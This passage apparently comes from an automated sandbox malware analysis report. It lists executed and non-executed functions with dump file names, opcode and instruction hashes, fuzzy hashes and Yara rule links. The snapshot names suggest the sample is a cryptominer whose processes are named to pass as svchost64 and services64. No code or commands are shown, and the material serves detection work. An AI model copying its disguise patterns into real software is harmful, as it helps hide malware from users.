                                                                                                                                                                  • Instruction Fuzzy Hash: 26F09662404F4481D2019F18A80039B7370FF5D789F155316EF893A524DF38C5838704
                                                                                                                                                                  Function 00403B10 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4020351045-0
                                                                                                                                                                  • Opcode ID: ceb08392f0f0196451ed73ec1588cb59bb9190dd5b54884ddebfc31a683c845f
                                                                                                                                                                  • Instruction ID: 49b5b9d9f717b9c60c7d99ed3eeeed97c410c8773a172d4d4432b2e755920db8
                                                                                                                                                                  • Opcode Fuzzy Hash: ceb08392f0f0196451ed73ec1588cb59bb9190dd5b54884ddebfc31a683c845f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A0192A1311704C2DA08EF15E89032537B4F794B89F544836CB0DA33A1DB3CDA91C34D

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAC0570 Relevance: 1.9, Strings: 1, Instructions: 658COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3CM_^
                                                                                                                                                                  • API String ID: 0-3911827768
                                                                                                                                                                  • Opcode ID: 273d9aad3edd6273a0d0221e28a8857e3cb09b4e723599564a4fcdde52afe6a2
                                                                                                                                                                  • Instruction ID: 80636fa65411ea63ec075ed1752ed2de58adbd437d17aebe17edeaff8b14a7f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 273d9aad3edd6273a0d0221e28a8857e3cb09b4e723599564a4fcdde52afe6a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A81A221B18D494FE7A4FB7C8469BB977D2EFA8314F0406B9E05DC72EBDD68A8418341
                                                                                                                                                                  Function 00007FFD9BAC0BC5 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ccab738c0db944975b6bf905172f6ec2fb658a0146dcc0879398422d89502182
                                                                                                                                                                  • Instruction ID: 13fe929c9560ba1d67c7d2b25ddb3f309c47e76a1828d628500686fa7a302c7b
                                                                                                                                                                  • Opcode Fuzzy Hash: ccab738c0db944975b6bf905172f6ec2fb658a0146dcc0879398422d89502182
                                                                                                                                                                  • Instruction Fuzzy Hash: 78713C20B1DA894FD765FB6C98656B97BE1EF9A314F0401BAF08DC3293DD586C42C346
                                                                                                                                                                  Function 00007FFD9BAC0478 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1d48319ab43bf7688727df1438c0bf2f898ce7e269ca8a68df917d395a1711b8
                                                                                                                                                                  • Instruction ID: f6a8bab34af59d4083f9464afda4b6636462d71d44e6fe1fbd8dc849cef52f30
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48319ab43bf7688727df1438c0bf2f898ce7e269ca8a68df917d395a1711b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A51D630B1DA494FEB58FB6C94656B877D1EF99714F05017AE04DC32A3DD64AC428346
                                                                                                                                                                  Function 00007FFD9BAC0488 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2cc76266e1e11fb06b9e739880d144e0bdf4a920dfef7990056ab6eef277c494
                                                                                                                                                                  • Instruction ID: 97c56dd2c4c623cb9eb6a488dac250fe491646c2b86028091be8aaa486ed01f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cc76266e1e11fb06b9e739880d144e0bdf4a920dfef7990056ab6eef277c494
                                                                                                                                                                  • Instruction Fuzzy Hash: DF51D730B1DA094FEBA8FB6C94697BD77D1EF99714F05017AE04DC3292DE64AC428345
                                                                                                                                                                  Function 00007FFD9BAC0E0A Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1001d2c60be98d25b574984f001a96c03a1109d665d4afd9b908603d778e4c69
                                                                                                                                                                  • Instruction ID: 532a846705b903d0977d45e3b36904522b6952d91ec4c116ed523567616ea058
                                                                                                                                                                  • Opcode Fuzzy Hash: 1001d2c60be98d25b574984f001a96c03a1109d665d4afd9b908603d778e4c69
                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0E57351D74C1EE758A559AC179F63B98EB83270F00105FE19EC6153E1526913C256

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAC0ECD Relevance: 1.6, Instructions: 1602COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: aaee7ed06daccbd9b364a9618b5c3ec003dc6358c9baba43cf8edb6313356e6a
                                                                                                                                                                  • Instruction ID: 7836dfc56866fb7dec924b09efd2536034403bf58dc6424f0875d55c1dac01f1
                                                                                                                                                                  • Opcode Fuzzy Hash: aaee7ed06daccbd9b364a9618b5c3ec003dc6358c9baba43cf8edb6313356e6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F92A330B1991D8FEBA4FB688465B79B3E2FF98304F5541B9D00EC32E6DE68AD418741
                                                                                                                                                                  Function 00007FFD9BAC2A6D Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e1dd3b5169c21fa30b1626c5efd78199b69a7b602660d78af6fdeb936482613b
                                                                                                                                                                  • Instruction ID: 370f8d32083e556cc6e084ebaf57629ecfef1b2353d7f3265d80abed6a5330bd
                                                                                                                                                                  • Opcode Fuzzy Hash: e1dd3b5169c21fa30b1626c5efd78199b69a7b602660d78af6fdeb936482613b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D315922B0EB8A4FE361AB7C88316B93BE0EF16354B0501FAD09ACB1E7CD5868058351
                                                                                                                                                                  Function 00007FFD9BAC0830 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 52224eeed6b2e6b3a501bc291a5560dbdf63f8754090a519c0e1a4f3e74f16a9
                                                                                                                                                                  • Instruction ID: 0334346edd36a5cfc94a01975cb32698e378e5923a0f89f1974c5b2ee5180a5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 52224eeed6b2e6b3a501bc291a5560dbdf63f8754090a519c0e1a4f3e74f16a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A817031F19A5D4FDB94EBA8C8A4AAC7BF1FF59300F4501B6D009D72A6DE28A8418B41
                                                                                                                                                                  Function 00007FFD9BAC0850 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0a542643766d236e73e93b9f6d5fd51771b5d7b9f7f336dc4141a8ac11fe3ff7
                                                                                                                                                                  • Instruction ID: 1ccd51b44fa0d3f8b4aabb77510192ac31e6bbffb3ddbd0ccbf8deb1058463e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a542643766d236e73e93b9f6d5fd51771b5d7b9f7f336dc4141a8ac11fe3ff7
                                                                                                                                                                  • Instruction Fuzzy Hash: EB616235F0995D8FDB64FBA8C8A4ABC77B1FF58300F4101B6D009D72A6DE24A941CB41
                                                                                                                                                                  Function 00007FFD9BAC0AB0 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 34853649384dbba900f3a52e66b2ae9a9b585a84cacfab1b5a2afe05f9ee00d0
                                                                                                                                                                  • Instruction ID: e7a4ce241463fcdcf407a719413ae962e8d2c71c2edc5a08bb3f6916a90e42d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 34853649384dbba900f3a52e66b2ae9a9b585a84cacfab1b5a2afe05f9ee00d0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8151C330B2CA494FEB58EB2C8469A7977D1FF9C708F040679E08EC3396DE64AC428745
                                                                                                                                                                  Function 00007FFD9BAC085C Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 31704ed5328d33d5adf6962fbc8eacbb2192172357a5f7d0b295968511059de3
                                                                                                                                                                  • Instruction ID: 3ab2029322f27aaac67a947edca07269e957a2ae2d421684168811374f233f39
                                                                                                                                                                  • Opcode Fuzzy Hash: 31704ed5328d33d5adf6962fbc8eacbb2192172357a5f7d0b295968511059de3
                                                                                                                                                                  • Instruction Fuzzy Hash: EA514F31F1995D8FDB54FBA8C8A4AACB7B1FF58300F4001B5D009D7296DE78A845CB41
                                                                                                                                                                  Function 00007FFD9BAC0860 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cb1560df28c6f45d4b452155a9155509c165207abb09d9207c305f64f5db244e
                                                                                                                                                                  • Instruction ID: b0f614eb93ad2774ab70b1cd5d13bdfc64daa86188558c02c9c3aa341bc97978
                                                                                                                                                                  • Opcode Fuzzy Hash: cb1560df28c6f45d4b452155a9155509c165207abb09d9207c305f64f5db244e
                                                                                                                                                                  • Instruction Fuzzy Hash: D0513030F1995D8FDB54FBA8C8A4AADB7B1FF58304F4005B5E009D729ADE78A845CB41
                                                                                                                                                                  Function 00007FFD9BAC0A91 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 878e0d15efe70f2427f4d01277dd67458e72a6836b81b31eb80fce8f88bca352
                                                                                                                                                                  • Instruction ID: 64031c520c7aef6bf5ff38d8baf7bb205d23be246b8e1cd2e3edcf187a4c77cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 878e0d15efe70f2427f4d01277dd67458e72a6836b81b31eb80fce8f88bca352
                                                                                                                                                                  • Instruction Fuzzy Hash: 2241D321B1DA494FEB68EB6C8469BB977D1EF98704F040279F08DC32D7DDA8AC428745
                                                                                                                                                                  Function 00007FFD9BAC0870 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2887aba253f61efabb7528e4c4fc23beac3da36fdbcf3f850817f8db4c965c11
                                                                                                                                                                  • Instruction ID: 56596d1a7e4db32c612eb44d7c5f2446fc85fe100c6f539af39e942a23e266c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 2887aba253f61efabb7528e4c4fc23beac3da36fdbcf3f850817f8db4c965c11
                                                                                                                                                                  • Instruction Fuzzy Hash: DA512E30E1995D8FDB54FBA8C8A4AADB7B1FF58304F4005B5E009D729ADE74A941CB41
                                                                                                                                                                  Function 00007FFD9BAC0CF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2cfb4be5f4a35f5690e27671bb299b1e8829d9664ea6669bf88463902898750d
                                                                                                                                                                  • Instruction ID: 308ed54047cac5a436a68a052d7b6cd078fe663052eef2163fc01043b2896457
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cfb4be5f4a35f5690e27671bb299b1e8829d9664ea6669bf88463902898750d
                                                                                                                                                                  • Instruction Fuzzy Hash: 51F055B260D70C1EE758A609AC079F63798EB83230F00100EE19EC2143E01228138292
                                                                                                                                                                  Function 00007FFD9BAC0A50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8b34e6950548300683ce4e18b3264b80ffc8d20b178456510e012c1908f12165
                                                                                                                                                                  • Instruction ID: 0c5ac9c65bb331a33d1f9a7a7adb6d0777837bbcf96cbd2e4f19dfe1150f778b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b34e6950548300683ce4e18b3264b80ffc8d20b178456510e012c1908f12165
                                                                                                                                                                  • Instruction Fuzzy Hash: 82E08021F18C1D0F9AA4FB3D5865E6563D2EFDC32074546F6E40CC329ADD28DC414381

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00007FFD9BAC06D1 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: M_^#$M_^%$M_^3$M_^5$M_^7$M_^9$M_^=
                                                                                                                                                                  • API String ID: 0-4104247842
                                                                                                                                                                  • Opcode ID: e5df2f1a0c94c2a5700bd2ec53dc98dc43668e58568cc1cc3a7b51a85b683ab9
                                                                                                                                                                  • Instruction ID: f943ed48b8587d870d3249667bc72643fc3be34ae975d2e2a84b3a5905bf9faa
                                                                                                                                                                  • Opcode Fuzzy Hash: e5df2f1a0c94c2a5700bd2ec53dc98dc43668e58568cc1cc3a7b51a85b683ab9
                                                                                                                                                                  • Instruction Fuzzy Hash: D32107776040298AD316BA6CBCA55DC3354EE9033E75507B3D4A9CE093ED25A08BC9C4
                                                                                                                                                                  Function 00007FFD9BAC06F0 Relevance: 8.8, Strings: 7, Instructions: 9COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: M_^#$M_^%$M_^3$M_^5$M_^7$M_^9$M_^=
                                                                                                                                                                  • API String ID: 0-4104247842
                                                                                                                                                                  • Opcode ID: a6b0545bb5e748944968631a0bfd2d6ce81ce9f096ebc217463a6d09893af3e6
                                                                                                                                                                  • Instruction ID: a90f509e53ab9ddc71dcf2d3176be1cbdc3aa4ca6c9cfb1f6b7c849cf730c3f0
                                                                                                                                                                  • Opcode Fuzzy Hash: a6b0545bb5e748944968631a0bfd2d6ce81ce9f096ebc217463a6d09893af3e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 98C09B0190D29104D35572BC3C215D41B004F1653F70CC7F7F4DD0C0D74C042049C14D

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAD0570 Relevance: 1.9, Strings: 1, Instructions: 658COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3CL_^
                                                                                                                                                                  • API String ID: 0-3907758863
                                                                                                                                                                  • Opcode ID: 3402e8dd738321724acd605a9a3561a3f744a7bd3f042df60696dd445eb77d60
                                                                                                                                                                  • Instruction ID: eb913c4327095959294c1e44d55e0cb6fd3ec7129d2486105729fd81635c7670
                                                                                                                                                                  • Opcode Fuzzy Hash: 3402e8dd738321724acd605a9a3561a3f744a7bd3f042df60696dd445eb77d60
                                                                                                                                                                  • Instruction Fuzzy Hash: D381B121B18D494FE7A4FB7C8879BA977D2EF99314F0406B9E01DC72EBDD68A8418341
                                                                                                                                                                  Function 00007FFD9BAD0BC5 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e18c10c158f7297c30c1f3d1203892f47a88e6cf4d3e6691629e13399db0dae
                                                                                                                                                                  • Instruction ID: e635819ef31556c94385705d9a09dcd1a6a7f4eaa99f8f7f75eb6a0a7d9c2151
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e18c10c158f7297c30c1f3d1203892f47a88e6cf4d3e6691629e13399db0dae
                                                                                                                                                                  • Instruction Fuzzy Hash: 45712A20B1DA894FDB65EB6C98756B97BE1EFDA314F0401BAE08DC32A3DD585C42C346
                                                                                                                                                                  Function 00007FFD9BAD0478 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 67e585d44da8378e9375b5c7df26702735bdc638f9b2b89451625505f1607b3e
                                                                                                                                                                  • Instruction ID: 25e55a16a58fcb20676128225c3d397038e60c32c41ae445fde16e36155887cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 67e585d44da8378e9375b5c7df26702735bdc638f9b2b89451625505f1607b3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A510830B1DA494FEB58EB6C98697BC77D1EF9D314F44027AE04DC32A2DD64AC428786
                                                                                                                                                                  Function 00007FFD9BAD0488 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6f3c3ecf833f107fd320545649c5be650ec84069228072bf476b315a448d155e
                                                                                                                                                                  • Instruction ID: 26f22a08db0a60604e50060b25d3c3ea406cc080e1aea6ea28264500278ba8f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f3c3ecf833f107fd320545649c5be650ec84069228072bf476b315a448d155e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851D831B1C9094FEB98EB6C94697BD77D1EF99710F40027AE04DC32A6DE64AC428786
                                                                                                                                                                  Function 00007FFD9BAD0E0A Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 140f4e28bf58017f7897243453404a3403bd1744ce8f81e7cc41e5591c0b8063
                                                                                                                                                                  • Instruction ID: 439f5a7a8f0a32d1250ed3cc558cd6f55a65d13adcbcf965b002e19100b80b29
                                                                                                                                                                  • Opcode Fuzzy Hash: 140f4e28bf58017f7897243453404a3403bd1744ce8f81e7cc41e5591c0b8063
                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0207250D64C2EE7189559AC279F63B98EA83260B00000EE08A82142E1522913C292

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAA0570 Relevance: 1.9, Strings: 1, Instructions: 658COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
